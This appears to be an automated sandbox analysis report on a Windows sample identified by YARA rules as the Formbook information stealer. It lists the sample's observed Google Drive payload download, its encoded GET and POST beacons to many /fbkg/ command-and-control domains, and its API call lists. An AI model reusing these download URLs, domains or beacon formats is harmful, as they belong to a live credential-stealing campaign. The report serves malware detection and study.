        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utm
        Source: extrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lets-room.online&amp;reg_source=parking_auto
        Source: unknownHTTP traffic detected: POST /fbkg/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,enHost: www.bellcom.mediaContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.bellcom.mediaReferer: http://www.bellcom.media/fbkg/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 30 58 63 38 52 73 38 6b 64 61 43 69 63 42 45 6e 4e 52 4f 6f 2f 37 49 50 54 4e 43 31 72 48 4d 5a 36 64 4e 71 59 77 4d 42 6b 5a 53 38 55 4b 59 2f 50 74 43 64 6f 71 4b 4c 45 48 4c 2b 6f 70 6b 65 46 32 2b 79 2f 2b 39 37 34 6d 4e 49 44 39 72 7a 74 6a 77 41 48 75 53 34 31 79 37 5a 79 45 6c 4c 72 33 79 70 30 69 63 61 6e 6d 57 32 61 35 69 62 39 4d 6c 4f 67 49 36 54 66 75 70 32 63 59 6b 48 4a 38 6e 56 72 68 48 32 49 41 34 44 4f 6a 36 79 30 35 54 33 4c 4f 4c 69 62 76 78 33 2b 74 64 49 59 31 65 57 70 77 3d 3d Data Ascii: T6I=M8aw9fXlF22U0Xc8Rs8kdaCicBEnNROo/7IPTNC1rHMZ6dNqYwMBkZS8UKY/PtCdoqKLEHL+opkeF2+y/+974mNID9rztjwAHuS41y7ZyElLr3yp0icanmW2a5ib9MlOgI6Tfup2cYkHJ8nVrhH2IA4DOj6y05T3LOLibvx3+tdIY1eWpw==
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdjt93c9f8d0n714cnia796q3u/1700245500000/07385957382368565097/*/15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5?e=download&uuid=7c0286c5-d7f7-44f9-bef7-ac2965bbc2b0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-08-18-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.342448.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.bellcom.mediaConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.hcmesx.storeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.frhighdaypharms.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=PC8e0hC+cIQTnclfHQ3xPAnXS9OxWPaYzl0ycer2FX7V7GbntrkDNJJkHJfieMUxDyk07bs06KjLIr5P3Os380726bA+wrTdYA==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.g9rq2sx.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.jilimacao1.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=1e2gHfHHru8C8drNoa5nQ+ppQcfOtPpy/tqqaGYFPoE7F/MNi+0XBdtoIJB4HFmIBuT2tqcIait1CoK9oXPorw0w8HqvZiCD5A==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.lets-room.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=PmdWTXkLywcqbBlTiCrJQt3Yuck0afzst3mD161eQBW3I6FKBwy/y4jZCgtmn12fl81iUYGrhkG3BZZ88H83AYfIbFWSFx21qw== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.visionquestengage.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=JkjxJVy7+VXqa4gzNBPrmSWPXfQ7ycJIKM5SFrEbg6dYWeaIdA23wJ7qOttvdhiZexnFzUpO5XAbvrWtFrekBpAEzqUmGc3/RA==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.ritualyoga.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=phdEJzY3z123NWJi2+fkwEMFilDirFFbJmqiBLbxbwYPRraRZTedw0TneWwvlFl/lqwQMG1RzPJyvsXQPPSKc8SU/NqM8DtUSg== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.zzxxyy13.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.littlehappiez.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=NPALKBz6tnWwrGvL1qkXou5DT6PdsmzVmJQ0dMJxOdiepQUGM57E+42rms1x66Gf0nUj851MdR/onhYOJHuQNwzuR569J9mC8A== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.alwayswim.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=JvFp7LObb8w6k6PWFFu4/g+CbhB1FcykldcNag5cVf7fen5OcF+np2qjjm2WzVoow/Lbgs0uDNprrr2Z1f5x8N4+tvsVxyFjvg==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.meikaij.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=UungwqTjR2NkRdXrNdQfdlAnW2b4DymMYxcPl6KlSbWp+xJntUzCoedXs8frtFusR354iK6c4sMvjrt0XEEPlm9MfIU/t8N/Rw== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.ayotundewrites.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=p9Bv2ZaqDj0B+e+ypRT8GlSwNlQxTeh6EqXXTwB9+WRzCtFNeIn1Fpb3phnzmJVlQdbT0fpxscdkLw+HDUtKzdkzARk7C/olAA==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.scoopstarz.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.342448.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.bellcom.mediaConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.hcmesx.storeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.frhighdaypharms.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?T6I=PC8e0hC+cIQTnclfHQ3xPAnXS9OxWPaYzl0ycer2FX7V7GbntrkDNJJkHJfieMUxDyk07bs06KjLIr5P3Os380726bA+wrTdYA==&Nx1L1=526dgl_phJ HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.g9rq2sx.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew== HTTP/1.1Accept: */*Accept-Language: en-US,enHost: www.jilimacao1.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: unknownHTTPS traffic detected: 142.250.176.206:443 -> 192.168.11.20:50127 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.81.225:443 -> 192.168.11.20:50128 version: TLS 1.2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_004055B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004055B8

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: U6SJBLxT2Z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_004074580_2_00407458
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_00406C810_2_00406C81
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_6F771B5F0_2_6F771B5F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288D2EC2_2_3288D2EC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BD2102_2_328BD210
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295124C2_2_3295124C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328913802_2_32891380
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AE3102_2_328AE310
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295F3302_2_3295F330
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D508C2_2_328D508C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328900A02_2_328900A0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AB0D02_2_328AB0D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329570F12_2_329570F1
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294E0762_2_3294E076
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E02_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296010E2_2_3296010E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F1132_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3293D1302_2_3293D130
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328E717A2_2_328E717A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A06802_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295A6C02_2_3295A6C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295F6F62_2_3295F6F6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289C6E02_2_3289C6E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329136EC2_2_329136EC
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BC6002_2_328BC600
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3293D62C2_2_3293D62C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294D6462_2_3294D646
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C46702_2_328C4670
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289170C2_2_3289170C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329567572_2_32956757
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AA7602_2_328AA760
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A04452_2_328A0445
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329575C62_2_329575C6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295F5C92_2_3295F5C9
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296A5262_2_3296A526
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295FA892_2_3295FA89
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BFAA02_2_328BFAA0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295CA132_2_3295CA13
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295EA5B2_2_3295EA5B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32914BC02_2_32914BC0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328DDB192_2_328DDB19
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0B102_2_328A0B10
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295FB2E2_2_3295FB2E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B68822_2_328B6882
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329198B22_2_329198B2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A58B02_2_328A58B0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329518DA2_2_329518DA
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329578F32_2_329578F3
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A38002_2_328A3800
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE8102_2_328CE810
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329408352_2_32940835
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328868682_2_32886868
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295F8722_2_3295F872
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A98702_2_328A9870
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB8702_2_328BB870
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289E9A02_2_3289E9A0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295E9A62_2_3295E9A6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328E59C02_2_328E59C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A1EB22_2_328A1EB2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32950EAD2_2_32950EAD
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32959ED22_2_32959ED2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32892EE82_2_32892EE8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C0E502_2_328C0E50
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32940E6D2_2_32940E6D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295EFBF2_2_3295EFBF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32951FC62_2_32951FC6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328ACF002_2_328ACF00
